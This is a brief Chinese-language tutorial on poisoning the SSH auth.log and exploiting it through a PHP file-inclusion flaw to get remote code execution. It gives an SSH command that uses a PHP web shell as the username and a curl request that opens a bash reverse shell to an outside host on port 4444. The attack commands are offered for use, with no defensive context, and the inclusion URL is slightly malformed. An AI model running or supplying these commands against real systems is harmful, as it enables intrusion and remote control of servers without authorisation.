首先介绍一下这个日志,这个是ssh的登陆日志,会记录下ssh登录,sudo,su等命令的相关信息,这里需要重点提及的是,会记录下ssh登录时的用户名。
这个文件的权限一般是310所以不会被除root用户外的其他用户直接写入,一般也不能被除root组外的其他用户读取,但是一旦可以被读取,就可以在这上面下文章了 .
## 利用方法
之前说过auth日志会保存尝试ssh登录的用户名而不去校验这个用户名是否合法或在本地存在
那么我们就可以在用户名处注入可以被执行的脚本然后尝试访问他就可以实现RCE命令执行
操作如下
~~~shell
ssh '<?php system($_GET[cmd]);?>'@192.168.49.230 #实现命令
~~~
反弹shell
~~~shell
curl -is 'http://192.168.1.20/index.php?file=/var/log/auth.log/cmd=bash -i >& /dev/tcp/192.168.73.96/4444 0>&1'
~~~
更多利用方法请扩大你的脑洞